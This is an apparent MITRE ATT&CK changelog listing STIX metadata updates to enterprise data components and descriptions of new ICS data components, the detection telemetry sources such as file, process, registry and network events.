x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273578Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273578Z2021-10-20T15:05:19.273Z

Snapshot: Snapshot Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273532Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273532Z2021-10-20T15:05:19.273Z

Persona: Social Media

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273649Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273649Z2021-10-20T15:05:19.273Z

User Account: User Account Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271482Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271482Z2021-10-20T15:05:19.271Z

User Account: User Account Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271504Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271504Z2021-10-20T15:05:19.271Z

User Account: User Account Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271456Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271456Z2021-10-20T15:05:19.271Z

User Account: User Account Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271526Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271526Z2021-10-20T15:05:19.271Z

Volume: Volume Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275094Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275094Z2021-10-20T15:05:19.275Z

Volume: Volume Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275140Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275140Z2021-10-20T15:05:19.275Z

Volume: Volume Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275181Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275181Z2021-10-20T15:05:19.275Z

Volume: Volume Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275161Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275161Z2021-10-20T15:05:19.275Z

Volume: Volume Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275118Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275118Z2021-10-20T15:05:19.275Z

WMI: WMI Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271827Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271827Z2021-10-20T15:05:19.271Z

Web Credential: Web Credential Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271909Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271909Z2021-10-20T15:05:19.271Z

Web Credential: Web Credential Usage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271933Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271933Z2021-10-20T15:05:19.271Z

Windows Registry: Windows Registry Key Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273968Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273968Z2021-10-20T15:05:19.273Z

Windows Registry: Windows Registry Key Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273900Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273900Z2021-10-20T15:05:19.273Z

Windows Registry: Windows Registry Key Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273923Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273923Z2021-10-20T15:05:19.273Z

Windows Registry: Windows Registry Key Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273944Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273944Z2021-10-20T15:05:19.273Z
Deprecations

Cluster: Cluster Metadata

Current version: 1.0

Description: Contextual data about a cluster and activity around it such as name, namespace, age, or status

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.274804Z2022-10-20T20:54:47.331Z
created2021-10-20T15:05:19.274804Z2021-10-20T15:05:19.274Z

ics-attack

New Data Components

Application Log: Application Log Content

Current version: 1.0

Description: Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)


Asset: Asset Inventory

Current version: 1.0

Description: This includes sources of current and expected devices on the network, including the manufacturer, model, and necessary identifiers (e.g., IP and hardware addresses)


Command: Command Execution

Current version: 1.1

Description: The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )


Operational Databases: Device Alarm

Current version: 1.0

Description: This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes


Drive: Drive Creation

Current version: 1.0

Description: Initial construction of a drive letter or mount point to a data storage device


Drive: Drive Modification

Current version: 1.0

Description: Changes made to a drive letter or mount point of a data storage device


File: File Access

Current version: 1.0

Description: Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)


File: File Creation

Current version: 1.0

Description: Initial construction of a new file (ex: Sysmon EID 11)


File: File Deletion

Current version: 1.0

Description: Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)


File: File Metadata

Current version: 1.0

Description: Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.


File: File Modification

Current version: 1.0

Description: Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)


Firmware: Firmware Modification

Current version: 1.0

Description: Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)


Logon Session: Logon Session Creation

Current version: 1.1

Description: Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)


Logon Session: Logon Session Metadata

Current version: 1.0

Description: Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it


Module: Module Load

Current version: 1.0

Description: Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)


Network Traffic: Network Connection Creation

Current version: 1.1

Description: Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)


Network Share: Network Share Access

Current version: 1.0

Description: Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)


Network Traffic: Network Traffic Content

Current version: 1.0

Description: Logged network traffic data showing both protocol header and body values (ex: PCAP)


Network Traffic: Network Traffic Flow

Current version: 1.0

Description: Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)


Process: OS API Execution

Current version: 1.0

Description: Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)


Process: Process Creation

Current version: 1.1

Description: The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)


Operational Databases: Process History/Live Data

Current version: 1.0

Description: This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices


Process: Process Metadata

Current version: 1.0

Description: Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.


Process: Process Termination

Current version: 1.0

Description: Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)


Operational Databases: Process/Event Alarm

Current version: 1.0

Description: This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)


Scheduled Job: Scheduled Job Creation

Current version: 1.0

Description: Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)


Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Description: Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.


Scheduled Job: Scheduled Job Modification

Current version: 1.0

Description: Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)


Script: Script Execution

Current version: 1.1

Description: The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)


Service: Service Creation

Current version: 1.0

Description: Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)


Service: Service Metadata

Current version: 1.0

Description: Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.


Service: Service Modification

Current version: 1.0

Description: Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)


Asset: Software

Current version: 1.0

Description: This includes sources of current and expected software or application programs deployed to a device, along with information on the version and patch level for vendor products, full source code for any application programs, and unique identifiers (e.g., hashes, signatures).


User Account: User Account Authentication

Current version: 1.1

Description: An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)


Windows Registry: Windows Registry Key Deletion

Current version: 1.0

Description: Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)


Windows Registry: Windows Registry Key Modification

Current version: 1.0

Description: Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)